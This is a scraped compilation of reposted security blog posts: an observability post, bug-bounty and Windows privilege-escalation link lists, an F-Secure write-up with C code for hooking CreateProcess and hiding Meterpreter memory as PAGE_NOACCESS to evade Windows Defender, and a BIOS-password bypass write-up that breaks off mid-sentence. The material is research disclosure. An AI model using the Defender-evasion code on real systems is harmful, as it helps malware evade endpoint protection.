[[pipeline.console.steps]] type = "Buffer" interval_s = 1 enable_histograms = false [pipeline.console.config] backend = "Console" And finally, aggregate events by every second to reduce the amount of data we have to analyse, then print it to the console. Enabling aggregation is a good idea if you want to load the results into your preferred analytics stack as I did, because a raw event dump get very large very quickly. Conclusion This was a quick-ish and fun exercise to see how far we can push our tools in security research. It’s great seeing the amount of effort the community puts into securing critical infrastructure, and in these unprecedented times, privacy and security of video conferencing is definitely at the top of the list as companies are still figuring out how to transition to more sustainable remote environments. More importantly, it shows that programs are just programs, it doesn’t matter whether we call them containers or desktop applications, the same methodology applies to monitoring them. A large benefit of deploying an observability layer that doesn’t require opt-in from the applications is the immediate increase in coverage, whether it’s for tracing, or security-related work. The layers of data can be aggregated using ingraind’s powerful tagging system, which allows in-depth analysis across the different abstraction layers that make up the environment. If you’d like to find out more information about ingraind, visit our information page below. Happy hacking in your sandboxes! Sursa: https://blog.redsift.com/labs/zooming-in-on-observability/
-
Resources-for-Beginner-Bug-Bounty-Hunters Intro There are a number of new hackers joining the community on a regular basis and more than often the first thing they ask is "How do I get started and what are some good resources?". As a hacker, there a ton of techniques, terminologies, and topics you need to familiarize yourself with to understand how an application works. Cody Brocious (@daeken), @0xAshFox, and I put these resources together in order to help new hackers with resources to learn the basics of Web Application Security. We understand that there are more resources other than the ones we have listed and we hope to cover more resources in the near future! Current Version: 2020.05 Changelog: See what's new! ? Table of Contents Basics Setup Tools Labs & Testing Environments Vulnerability Types Mobile Hacking Smart Contracts Coding & Scripting Hardware & IoT Blog posts & Talks Media Resources Certifications Mindset & Mental Health If you have more questions or suggestions, come the Discord Server of nahamsec ! Sursa: https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
-
- 1
-
-
Bypassing Windows Defender Runtime Scanning Charalampos Billinis, 1 May 2020 Introduction Windows Defender is enabled by default in all modern versions of Windows making it an important mitigation for defenders and a potential target for attackers. While Defender has significantly improved in recent years it still relies on age-old AV techniques that are often trivial to bypass. In this post we’ll analyse some of those techniques and examine potential ways they can be bypassed. Antivirus 101 Before diving into Windows Defender we wanted to quickly introduce the main analysis methods used by most modern AV engines: Static Analysis – Involves scanning the contents of a file on disk and will primarily rely on a set of known bad signatures. While this is effective against known malware, static signatures are often easy to bypass meaning new malware is missed. A newer variation of this technique is machine learning based file classification which essentially compares static features against known good and bad profiles to detect anomalous files. Process Memory/Runtime Analysis – Similar to the static analysis except running process memory is analysed instead of files on disk. This can be more challenging for attackers as it can be harder to obfuscate code in memory as its executing and off the shelf payloads are easily detected. It’s also worth mentioning how scans can be triggered: File Read/Write – Whenever a new file is created or modified this can potentially trigger the AV and cause it to initiate a scan of the file. Periodic – AV will periodically scan systems, daily or weekly scans are common and this can involve all or just a subset of the files on the system. This concept also applies to scanning the memory of running processes. Suspicious Behaviour – AV will often monitor for suspicious behaviour (usually API calls) and use this to trigger a scan, again this could be of local files or process memory. In the next few sections we’ll discuss potential bypass techniques in more detail. Bypassing Static Analysis With a Custom Crypter One of the most well-documented and easiest ways to bypass static analysis is to encrypt your payload and decrypt it upon execution. This works by creating a unique payload every time rendering static file signatures ineffective. There are multiple open source projects which demonstrate this (Veil, Hyperion, PE-Crypter etc.) however we also wanted to test memory injection techniques so wrote a custom crypter to incorporate them in the same payload. The crypter would take a “stub“ to decrypt, load and execute our payload and the malicious payload itself. Passing these through our crypter would combine them together into our final payload which we can execute on our target. The proof of concept we created included support for a number of different injection techniques that are useful to test against AVs including local/remote shellcode injection, process hollowing and reflective loading. Parameters for these techniques were passed in the stub options. All of the above techniques were able to bypass Windows Defender’s static file scan when using a standard Metasploit Meterpreter payload. However, despite execution succeeding we found that Windows Defender would still kill the Meterpreter session when commands such as shell/execute were used. But why? Analysing Runtime Analysis As mentioned earlier in this post memory scanning can be periodic or “triggered” by specific activity. Given that our Meterpreter session was only killed when shell/execute was used it seemed likely this activity was triggering a scan. To try and understand this behaviour we examined the Metasploit source code and found that Meterpreter used the CreateProcess API to launch new processes. // Try to execute the process if (!CreateProcess(NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, (STARTUPINFOA*)&si, &pi)) { result = GetLastError(); break; } Inspecting the arguments of CreateProcess and the code around it, nothing suspicious could be found. Debugging and stepping through the code also didn’t reveal any userland hooks, but once the syscall is executed on the 5th line, Windows Defender would find and kill the Meterpreter session. This suggested that Windows Defender was logging activity from the Kernel and would trigger a scan of process memory when specific APIs were called. To validate this hypothesis we wrote some custom code to call potentially suspicious API functions and then measure whether Windows Defender was triggered and would kill the Meterpreter session. VOID detectMe() { std::vector<BOOL(*)()>* funcs = new std::vector<BOOL(*)()>(); funcs->push_back(virtualAllocEx); funcs->push_back(loadLibrary); funcs->push_back(createRemoteThread); funcs->push_back(openProcess); funcs->push_back(writeProcessMemory); funcs->push_back(openProcessToken); funcs->push_back(openProcess2); funcs->push_back(createRemoteThreadSuspended); funcs->push_back(createEvent); funcs->push_back(duplicateHandle); funcs->push_back(createProcess); for (int i = 0; i < funcs->size(); i++) { printf("[!] Executing func at index %d ", i); if (!funcs->at(i)()) { printf(" Failed, %d", GetLastError()); } Sleep(7000); printf(" Passed OK!\n"); } } Interestingly most test functions did not trigger a scan event, only CreateProcess and CreateRemoteThread resulted in a scan being triggered. This perhaps made sense as many of the APIs tested are frequently used, if a scan was triggered every time one of them was called Windows Defender would be constantly scanning and may impact system performance. Bypassing Windows Defender’s Runtime Analysis After confirming Windows Defender memory scanning was being triggered by specific APIs, the next question was how can we bypass it? One simple approach would be to avoid the APIs that trigger Windows Defender’s runtime scanner but that would mean manually rewriting Metasploit payloads which is far too much effort. Another option would be to obfuscate the code in memory, either by adding/modifying instructions or dynamically encrypting/decrypting our payload in memory when a scan a detected. But is there another way? Well one thing that works in an attacker’s favour is that the virtual memory space of processes is huge being 2 GB in 32 bits and 128 TB in 64 bits. As such AVs won’t typically scan the whole virtual memory space of a process and instead look for specific page allocations or permissions, for example MEM_PRIVATE or RWX page permissions. Reading through the Microsoft documentation though you’ll see one permission in particular that is quite interesting for us, PAGE_NOACCESS. This “Disables all access to the committed region of pages. An attempt to read from, write to, or execute the committed region results in an access violation.” which is exactly the kind of behaviour we are looking for. And quick tests confirmed that Windows Defender would not scan pages with this permission, awesome we have a potential bypass! To weaponize this we’d just need to dynamically set PAGE_NOACCESS memory permissions whenever a suspicious API was called (as that would trigger a scan) then revert it back once the scan is done. The only tricky bit here is we’d need to add hooks for any suspicious calls to make sure we can set permissions before the scan is triggered. Bringing this all together, we’d need to: Install hooks to detect when a Windows Defender trigger function (CreateProcess) is called When CreateProcess is called the hook is triggered and Meterpreter thread is suspended Set payload memory permissions to PAGE_NOACCESS Wait for scan to finish Set permission back to RWX Resume the thread and continue execution We’ll walk through the code for this in the next section. Digging into the hooking code We started by creating a function installHook which would take the address of CreateProcess as well as the address of our hook as input then update one with the other. CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle(L"KERNELBASE.dll"), "CreateProcessInternalW"); CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "CreateProcessInternalW"); hookResult = installHook(CreateProcessInternalW, hookCreateProcessInternalW, 5); Inside the installHook function you’ll see we save the current state of the memory then replace the memory at the CreateProcess address with a JMP instruction to our hook so when CreateProcess is called our code will be called instead. A restoreHook function was also created to do the reverse. LPHOOK_RESULT installHook(LPVOID hookFunAddr, LPVOID jmpAddr, SIZE_T len) { if (len < 5) { return NULL; } DWORD currProt; LPBYTE originalData = (LPBYTE)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, len); CopyMemory(originalData, hookFunAddr, len); LPHOOK_RESULT hookResult = (LPHOOK_RESULT)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, sizeof(HOOK_RESULT)); hookResult->hookFunAddr = hookFunAddr; hookResult->jmpAddr = jmpAddr; hookResult->len = len; hookResult->free = FALSE; hookResult->originalData = originalData; VirtualProtect(hookFunAddr, len, PAGE_EXECUTE_READWRITE, &currProt); memset(hookFunAddr, 0x90, len); SIZE_T relativeAddress = ((SIZE_T)jmpAddr - (SIZE_T)hookFunAddr) - 5; *(LPBYTE)hookFunAddr = 0xE9; *(PSIZE_T)((SIZE_T)hookFunAddr + 1) = relativeAddress; DWORD temp; VirtualProtect(hookFunAddr, len, currProt, &temp); printf("Hook installed at address: %02uX\n", (SIZE_T)hookFunAddr); return hookResult; } BOOL restoreHook(LPHOOK_RESULT hookResult) { if (!hookResult) return FALSE; DWORD currProt; VirtualProtect(hookResult->hookFunAddr, hookResult->len, PAGE_EXECUTE_READWRITE, &currProt); CopyMemory(hookResult->hookFunAddr, hookResult->originalData, hookResult->len); DWORD dummy; VirtualProtect(hookResult->hookFunAddr, hookResult->len, currProt, &dummy); HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, hookResult->originalData); HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, hookResult); return TRUE; } When our Metasploit payload calls the CreateProcess function, our custom hookCreateProcessInternalW method will be executed instead. hookCreateProcessInternalW calls createProcessNinja on another thread to hide the Meterpreter payload. BOOL WINAPI hookCreateProcessInternalW(HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation, PHANDLE hNewToken) { BOOL res = FALSE; restoreHook(createProcessHookResult); createProcessHookResult = NULL; printf("My createProcess called\n"); LPVOID options = makeProcessOptions(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation, hNewToken); HANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)createProcessNinja, options, 0, NULL); printf("[!] Waiting for thread to finish\n"); WaitForSingleObject(thread, INFINITE); GetExitCodeThread(thread, (LPDWORD)& res); printf("[!] Thread finished\n"); CloseHandle(thread); createProcessHookResult = installHook(CreateProcessInternalW, hookCreateProcessInternalW, 5); return res; } Notice that setPermissions is used to set the PAGE_NOACCESS permission on our memory before the call to CreateProcess is finally made. BOOL createProcessNinja(LPVOID options) { LPPROCESS_OPTIONS processOptions = (LPPROCESS_OPTIONS)options; printf("Thread Handle: %02lX\n", metasploitThread); if (SuspendThread(metasploitThread) != -1) { printf("[!] Suspended thread \n"); } else { printf("Couldnt suspend thread: %d\n", GetLastError()); } setPermissions(allocatedAddresses.arr, allocatedAddresses.dwSize, PAGE_NOACCESS); BOOL res = CreateProcessInternalW(processOptions->hToken, processOptions->lpApplicationName, processOptions->lpCommandLine, processOptions->lpProcessAttributes, processOptions->lpThreadAttributes, processOptions->bInheritHandles, processOptions->dwCreationFlags, processOptions->lpEnvironment, processOptions->lpCurrentDirectory, processOptions->lpStartupInfo, processOptions->lpProcessInformation, processOptions->hNewToken); Sleep(7000); if (setPermissions(allocatedAddresses.arr, allocatedAddresses.dwSize, PAGE_EXECUTE_READWRITE)) { printf("ALL OK, resuming thread\n"); ResumeThread(metasploitThread); } else { printf("[X] Coundn't revert permissions back to normal\n"); } HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, processOptions); return res; } A brief sleep of five seconds is taken to let the Windows Defender scan complete before the permissions of the Metasploit modules are reverted back to normal. Five seconds was sufficient during testing however this may take longer on other systems or processes. Also during testing it was found that some processes didn’t trigger Windows Defender even though they made calls to those WinAPI functions. Those processes are: explorer.exe smartscreen.exe So another potential bypass would be to simply inject your Meterpreter payload within either process and you would bypass Windows Defender’s memory scanner. Although unconfirmed we believe this may have been a performance optimization as those two processes often call CreateProcess. A custom Metasploit extension called Ninjasploit was written to be used as a post exploitation extension to bypass Windows Defender. The extension provides two commands install_hooks and restore_hooks which implement the memory modification bypass previously described. The extension can be found here: https://github.com/FSecureLABS/Ninjasploit Conclusion In recent years Windows Defender has made some great improvements, yet as this testing showed, with relatively little effort the static analysis and even runtime analysis can be bypassed. We showed how payload encryption and common process injection techniques could be used to bypass Windows Defender. And while more advanced runtime analysis provided an additional hurdle it was still relatively straight forward to bypass by abusing the limitations of real-time memory scanning. Although not the focus of this post it would have been interesting to perform the same testing against next-gen file classification as well as modern EDR solutions as these may have provided additional challenges. Special thanks Luke Jennings and Arran Purewal for all their help and support during this research project. References https://github.com/Veil-Framework/Veil https://github.com/nullsecuritynet/tools/tree/master/binary/hyperion/source https://github.com/FSecureLABS/Ninjasploit Sursa: https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/
-
Windows-Privilege-Escalation-Resources Compilation of Resources from TCM's Windows Priv Esc Udemy Course General Links Link to Website: https://www.thecybermentor.com/ Link to course: https://www.udemy.com/course/windows-privilege-escalation-for-beginners/ Link to discord server: https://discord.gg/RHZ7UF7 HackTheBox: https://www.hackthebox.eu/ TryHackMe: https://tryhackme.com/ TryHackMe Escalation Lab: https://tryhackme.com/room/windowsprivescarena Introduction Fuzzy Security Guide: https://www.fuzzysecurity.com/tutorials/16.html PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md Absoloom's Guide: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ Sushant 747's Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html Gaining a Foothold msfvenom: https://netsec.ws/?p=331 Exploring Automated Tools winpeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS Windows Priv Esc Checklist: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation Sherlock: https://github.com/rasta-mouse/Sherlock Watson: https://github.com/rasta-mouse/Watson PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc JAWS: https://github.com/411Hall/JAWS Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester Metasploit Local Exploit Suggester: https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/ Seatbelt: https://github.com/GhostPack/Seatbelt SharpUp: https://github.com/GhostPack/SharpUp Escalation Path: Kernel Exploits Windows Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits Kitrap0d Info: https://seclists.org/fulldisclosure/2010/Jan/341 MS10-059: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 Escalation Path: Passwords and Port Forwarding Achat Exploit: https://www.exploit-db.com/exploits/36025 Achat Exploit (Metasploit): https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof Plink Download: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html Escalation Path: Windows Subsystem for Linux Spawning TTY Shell: https://netsec.ws/?p=337 Impacket Toolkit: https://github.com/SecureAuthCorp/impacket Impersonation and Potato Attacks Rotten Potato: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ Juicy Potato: https://github.com/ohpe/juicy-potato Groovy Reverse Shell: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 Alternative Data Streams: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ Escalation Path: getsystem getsystem Explained: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ Escalation Path: Startup Applications icacls Docs: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls Escalation Path: CVE-2019-1388 ZeroDayInitiative CVE-2019-1388: https://www.youtube.com/watch?v=3BQKpPNlTSo Rapid7 CVE-2019-1388: https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-1388 Capstone Challenge Basic Powershell for Pentesters: https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters Mounting VHD Files: https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25 Capturing MSSQL Creds: https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478 Sursa: https://github.com/Gr1mmie/Windows-Privilege-Escalation-Resources/blob/master/README.md
-
Defeating a Laptop's BIOS Password We found a laptop laying around the office that had BIOS password enabled. On top of that, the laptop had secure boot turned on. We wanted to run an OS that was not signed with Microsoft's keys, so we really needed a way to get into the setup utility. Some minor details have been changed to obfuscate the manufacturer and the model of the target laptop. Table of Contents Table of Contents UEFI Primer Glossary The Boot Process Firmware Filesystem Flash Black Magic Dumping the Flash Parsing the Flash Messing with NVRAM Breaking and Entering Loading into Setup Modifying Firmware In-Memory GUID Hell Emulated EEPROM Boot-Time Shenanigans "The Incident" Enabling JTAG Locating the Options Editing NVRAM Variables in Flash Fixing "The Incident" Orienting Ourselves Executing Code Obligatory blurb UEFI Primer Glossary SEC - Security PEI - Pre-EFI Initialization DXE - Driver eXecution Environment PEI module/DXE driver/UEFI application - Microsoft PE formatted files containing firmware code Protocol - An instance of a struct identified by a GUID PCH - Platform Controller Hub The Boot Process Even today's modern 64-bit CPUs begin execution in 16-bit mode. In UEFI, this is called the SEC phase. The SEC phase configures a minimal set of CPU registers and then switches the CPU into 32-bit mode. This mode switch marks the end of the SEC phase and the beginning of the PEI phase. In þe days of olde the SEC phase also acted as the root of trust for the system, but nowadays that role is assigned to the PCH. The PCH verifies the firmware for the SEC and PEI phases before the CPU begins executing any code. The PEI phase configures some non-CPU platform components and optionally verifies the integrity of the DXE phase's code. After verification, the PEI phase switches the CPU into 64-bit mode and starts the DXE phase. The DXE phase contains all of the drivers and applications that run before your OS boots, including your OS's bootloader. Some of these drivers persist even after your OS has booted. Firmware Filesystem UEFI defines its own filesystem format for use in flash images. A flash image will contain one or more firmware volumes, and each volume will contain one or more firmware files. Files are identified by a GUID rather than by a name, although some file types define a way to optionally provide a name. A file can also be a container for another volume, which enables nested volumes (i.e. one volume within another). Nested volumes are commonly used to support volume compression. Flash Black Magic Dumping the Flash At heart, PCs are just large, powerful, embedded devices—and like most embedded devices they have flash chips that we can dump and rewrite. The flash chip is usually the chip with the bulkiest package on the board. We quickly identified the flash chip on our laptop's motherboard, and promptly attached it to a SPI flash programmer with some clips. Parsing the Flash The flash's contents were formatted as an Intel image and could readily be parsed by UEFITool Intel flash images are divided into several regions. However the only region that we cared about was the BIOS region. The BIOS region consists of several firmware filesystem volumes and an NVRAM variable storage area. We could have just found the file responsible for showing the setup screen to the user and patched out the password check, but that wasn't possible on this laptop because hardware-based firmware security was enabled. In the image above, areas marked in red are protected by Intel BootGuard. Before the CPU can execute any instructions the hash of the red areas is computed and then checked against a signature stored in the flash somewhere; the hash of the RSA public key used to verify that signature is fused into the PCH during the OEM's manufacturing process. The areas marked in cyan are protected by the OEM's code verification mechanism. The OEM has to implement it's own verification mechanism on top of BootGuard, because BootGuard only protects the SEC and PEI phases. The DXE phase also needs to be protected from modification. In most implementations, the cyan areas are hashed, and that hash is matched against a hash stored in a file in the red area. Since everything in the red area is already protected by BootGuard, another signature is not needed. However, no NVRAM variables can be protected because they're designed to be modified by end-users. Messing with NVRAM None of us had ever seen the secure boot enable flag or the BIOS password stored anywhere except inside of an NVRAM variable. So the first thing that we wanted to try was completely clearing all of the NVRAM variables and having the board use its default values for everything. If we were lucky, secure boot would be disabled and the BIOS password would be gone. However, when we tried to boot the board after clearing the variable store, we were presented with the following error message: 12B4: Bad Checksum of Sec Settings in NVRAM variable. We searched for a portion of that string in the dump, and then loaded the DXE driver containing it into IDA. Once it was loaded, we followed the x-refs to reach the code that referenced it. It seemed like it would attempt to get a handle to a protocol with a certain GUID, and if it was not able to, it would get a handle to the logging protocol and send it that error message. We tracked down the driver that implemented the desiered protocol and looked at all of the NVRAM variables it attempted to access. One of them had SecConfig in its name, so we tried clearing all NVRAM variables except for that one and hoped for the best. The board booted successfully and secure boot was disabled, :D! The BIOS password, however, was still enabled... :(. It couldn't have been stored in the SecConfig variable, because after looking at its contents we determined that it was just a bunch of enable/disable flags. There was not enough data in the variable to contain either the password itself or the hash of the password. From these findings, we concluded that the BIOS password had to be stored somewhere other than NVRAM, and that it could have even been stored off-flash on an entirely different chip. Breaking and Entering Loading into Setup It was possible to return to the boot device selection menu after you had booted into a flash drive by exiting the UEFI app that was running (in this case a copy of the UEFI shell). However, when this was done the option to enter the setup menu from within the boot menu would disappear. We looked at the NVRAM boot entry for the setup menu and saw that it was booting into a UEFI app with a GUID of 2AD48FB3-2E28-42F2-88D5-A73EC922DCBA. By searching for that GUID in UEFITool, we found the app's executable in the firmware. We extracted it and put it on our flash drive. We tried executing the app from within our shell, but for some reason the executable was marked as a DXE driver instead of a UEFI app. We managed to get it to execute by using the load command instead of running it directly, but even when we started it that way we were presented with the password prompt. Modifying Firmware In-Memory We wanted to track down the driver that handled the password checking logic so that we could patch it in memory. The patch we wanted to make would make it think that no password was set. It wouldn't be a permanent fix, but if it worked it would allow us to get into the setup menu. With nothing else to go on, we looked through the names of all of the DXEs in the firmware image. One that stood out to us was BpwManager because we thought that Bpw might have been short for BIOS password. We loaded it into IDA, and then looked at all of its strings. We knew we had the right driver when we saw 12AE: Sys Security - BIOS password entry failure count exceeded in the string list. The driver registered one protocol which consisted of several function pointers. We looked at all of the places that the setup utility used that protocol and found one place where we believed that it was determining whether or not a BIOS password was enabled. It called one of the functions provided by the protocol, and if the return value had its lowest bit set, it would do something with the string Enabled, otherwise it would do something with the string Disabled. ((void (__fastcall *)(BpwProtocol *, _QWORD, char *))bpwProtocol->GetBPWFlags)(bpwProtocol, 0i64, &bpwFlags); v13 = L"Enabled"; if ( !(bpwFlags & 1) ) v13 = L"Disabled"; We assumed this was related to the code for displaying the menu entry for the BIOS password, and that the function it was calling was some sort of GetFlags() function. The code for that function just read in a value from a memory address and returned it. We used our UEFI shell to edit the flag value in memory and set it to 0, and then we tried loading the setup utility again. It worked! We were even able to go to the security tab and unset/reset the BIOS password! Sadly, after we rebooted the laptop and tried to enter the setup utility normally, it still prompted us for the old password :(. Something weird was going on. GUID Hell Emulated EEPROM Almost every function in the BpwManager driver called into a protocol with a GUID of 9FFA2362-7344-48AA-8208-4F7985A71B51. We used UEFITool's search by GUID function to find all references to that protocol. One result in particular piqued our interest, it was a driver named EmuSecEepromDxe. We loaded it into IDA and confirmed that this was the driver registering the protocol in question. The protocol consisted of three function pointers, one of which did nothing except just return an error value. Based on the Hex-Rays output of the two remaining functions and how they were used in the BpwManager driver, we constructed this structure to describe the protocol: struct EmuSecEepromProtocol { public: EFI_STATUS (*eepromRead)(EmuSecEepromProtocol *this, __int64 eepromBankID, __int64 byteIndex, unsigned char *b); EFI_STATUS (*eepromWrite)(EmuSecEepromProtocol *this, __int64 eepromBankID, __int64 byteIndex, unsigned char b); EFI_STATUS (*returnError)(); }; We determined that the emulated EEPROM was divided into several sections, which we called banks. There were 8 banks, containing 0x80 bytes each. Every eepromBankID referred to two continuous banks, with the second one being used for byte indices above 0x80. We determined that the information that was important to the BpwManager DXE was stored in bank ID 0x57. We wrote a quick UEFI app to try and read out all 0x100 bytes from that bank ID, but every call we made to eepromRead returned an error code for the first 0x80 bytes. That meant we were unable to read data from the first bank in the group of two. We tracked down where that error number was referenced in IDA. Reading through the code, we discovered that bank ID 0x5C was an array of access permissions for all of the banks. Every time something tried to read or write from a bank, it would check a byte in bank ID 0x5C based on the bank number (not ID number) being accessed. Bank ID 0x57 corresponded to bank numbers 6 and 7, and sure enough bank number 6 had permissions set to not allow reads or writes and bank number 7 allowed reads. This explained why we were able to read bytes from the second half but not from the first. We attempted to change the permission byte of bank number 6, but that gave us another error. We discovered that there was another bit in the permission byte that locked out further permission changes. We also tried patching out the jump instructions that lead to the error return code, but that didn't work either. Now we knew that the check was also happening somewhere outside of the driver. To track it down, we followed the path of all of the read/write requests and found that they eventually ended up at the CPU IO EFI protocol. The actual operations were happening off-CPU somewhere. Boot-Time Shenanigans We guessed that all emulated EEPROM operations were actually being handled by the embedded controller, but we didn't spend that much time searching for what was actually handling them; it was not that important for us to know. Almost every other chip on the board was in a BGA package that we didn't know the pinout for, so it would have been impractical to dump or reflash whatever chip it was stored on. We knew at some point during boot, the permissions had to be set to allow at least some operations, because the prompt asking you to type the password needed something to compare against and the setup utility had to have the ability to change the password. The hint that we needed was that the setup button would still be present in the boot menu if you booted into a built-in app such as the diagnostics splash screen, then exited it. However, like we noted earlier, if you booted into an external app, such as a UEFI shell on a flash drive, the "Enter Setup" button would disappear until the next reboot. We searched the dump for the names of one of the built-in apps to try and see if we could redirect it to the normally inaccessible, but built-in, UEFI shell. It turns out they're completely standard NVRAM UEFI boot entries. The attributes field of boot entries has a flag that means it's for an application, and instead of a path to a file to run, the variable contains the GUID of a built-in app. We modified one of these boot entries to point to the built-in shell, and then tried booting into it. It worked, and now we were in business! "The Incident" We read out the permission bytes for all of the banks and saw that they allowed all permissions on every bank. We then identified where the hash of the password was located within the EEPROM and wrote 0s to it. One of us had remembered seeing that if the BpwManager read all 0s for the password's hash, it would think that no password was set. Turns out, we were wrong. Really wrong. When we rebooted we were able to get into the boot menu, but choosing any boot entry was met with this error: 01240: Bad BPW data, stop boot. The error was only displayed for around 3 seconds, after which the system immediately powered off. Instead of patching the hash directly in the emulated EEPROM, we really should have done the same patch we did before to bypass the password prompt to get into the setup menu and changed it from there. Hindsight is 20/20. We were a little too excited about all of the permissions being enabled. Enabling JTAG At this point, the only way any of us could think of to save the board was JTAG. Even though the board had no JTAG connector, most Intel chipsets support JTAG-over-USB. They call it direct connect interface, or DCI, and there are two flavors: DbC (USB DebugClass) and OOB (out-of-band). OOB implements a completely different wire protocol on the USB pins and requires a special adapter that you can only get by signing an NDA with Intel. That left DbC; it's like USB On-the-Go but in reverse. You use a crossover USB 3.0 A-A cable to connect to the board you're trying to debug, and it will enumerate as a USB device. To interface with that USB device, you can use Intel System Studio, which can be downloaded for free without an NDA. It gives you a normal-ish debugger interface. Locating the Options We needed to figure out how to enable DCI. On most motherboards, the setup utility you can access only shows a small subset of the available cofiguration options. For some reason, the other options are usually still compiled-in, even though they'll always be hidden. Almost every interface you see in UEFI is based off of what the specification calls HII, or human interface infrastructure. HII interfaces are designed in a language called VFR (visual form representation), and are compiled into IFR (intermediate form representation). All we needed to do was find the DXE that displayed the options, and then extract the IFR from it. Once we had the IFR we could disassemble it to make it human readable. Fortunately for us, someone had already done the hard work of writing a tool to do all of those things. We used LongSoft's fork of Universal-IFR-Extractor. To find the correct DXE, we just searched for the name of one of the options in the setup utility. The output of the IFR extractor is a disassembled version of the bytecode, but it's still easy enough to understand. There are a number of VarStore objects defined like: VarStoreEFI: VarStoreId: 0x5 [8D6355D7-9BD1-44FF-B02F-925BA85A0FAC], Attrubutes: 3, Size: 572, Name: PchSetup Each VarStore corresponds to an NVRAM variable, given by its name and guid. The ID is used to reference it in options. Options are defined like: One Of: DCI enable (HDCIEN), VarStoreInfo (VarOffset/VarName): 0x8, VarStore: 0x5, QuestionId: 0x2D8, Size: 1, Min: 0x0, Max 0x1, Step: 0x0 One Of Option: Disabled, Value (8 bit): 0x0 (default) One Of Option: Enabled, Value (8 bit): 0x1 End One Of {29 02} The DCI enable option is stored in VarStore 5 at byte offset 8 and is 1 byte long. Setting that byte to 0 means disabled, and setting it to 1 means enabled. These are all of the options that we changed: DCI enable (HDCIEN) -> Enabled Debug Interface -> Enabled Debug Interface Lock -> Disabled Enable/Disable IED(Intel Enhanced Debug) -> Enabled Editing NVRAM Variables in Flash At this point since we were unable to boot into anything except the boot menu, our only option for editing those NVRAM variables was to write to them directly using our external flash programmer. We retrieved a fresh dump from the flash chip so we would only modify the current state rather than revert it to an earlier state and potentially cause even more things to break. We found the offsets of the variables in the flash using UEFITool. There is a header on each variable, so you need to skip past it to get to the actual value of the variable. After editing all of the variables thqat were needed to change the options, we reloaded the dump in UEFITool to verify that we didn't accidentally corrupt anything and that the value of the variables actually changed. After that, we re-flashed it, hooked up the crossover cable, powered-on the board, and hoped for the best. Luckily enough for us, it worked! This was our first time getting JTAG on an Intel-based computer, and it was very exciting—especially given how easy it turned out to be. Fixing "The Incident" Orienting Ourselves We booted into the boot menu and then broke into the debugger. We had no idea what portion of code we had broken into, much less where any of the code or data that we were interested in was located. Unfortunately, we hadn't thought to save the load addresses of any of the relevant DXE modules before "the incident" occured and made the board unbootable, so we had nothing to go on. The debugger had a built-in command that would list all of the loaded DXE modules, however it needed the address of the UEFI system table, and the automatic scan for it failed. In most UEFI binaries built using EDK-II, the system table gets stored in a global variable when the driver/app's entry point function executes. We dumped a handful of bytes from the address RIP was at, and then searched for those bytes in UEFITool to determine which module we were currently executing code in. We loaded that module into IDA and rebased the database to the module's load address. We figured out the module's load address by searching the IDA database for the bytes we pulled out earlier and computing an offset based on the value of RIP. Now that we had a nicely aligned IDA database, we could easily obtain the address of the global variable that contained a pointer to the system table. We retrieved the address of the system table from that variable, and supplied it to the debugger. Now, when we gave it the command to list DXE modules it actually gave us a list. The output was similar to: ModuleID Base Size Name 00001 0x00000000D5A32000 0x00018460 <no_debug_info> 00002 0x00000000D5A4B000 0x00003B80 <no_debug_info> 00003 0x00000000D5A4F000 0x00001200 <no_debug_info> 00004 0x00000000D5A51000 0x00002F40 <no_debug_info> 00005 0x00000000D5A54000 0x00000540 <no_debug_info> 00006 0x00000000D5A55000 0x00001620 <no_debug_info> ... Annoyingly, the debugger would not give us the module's name or even its GUID without debug info loaded. However, we could use the size of the module to narrow down the list of possible base addresses. UEFITool provided the size of each module. We examined the memory located at each of the remaining base addresses and compared it to the data that we extracted from the firmware dump to figure out which base address corresponded to each module we were interested in. Executing Code We pondered the best way to execute arbitrary code for a while. We realized that all of the code we would need 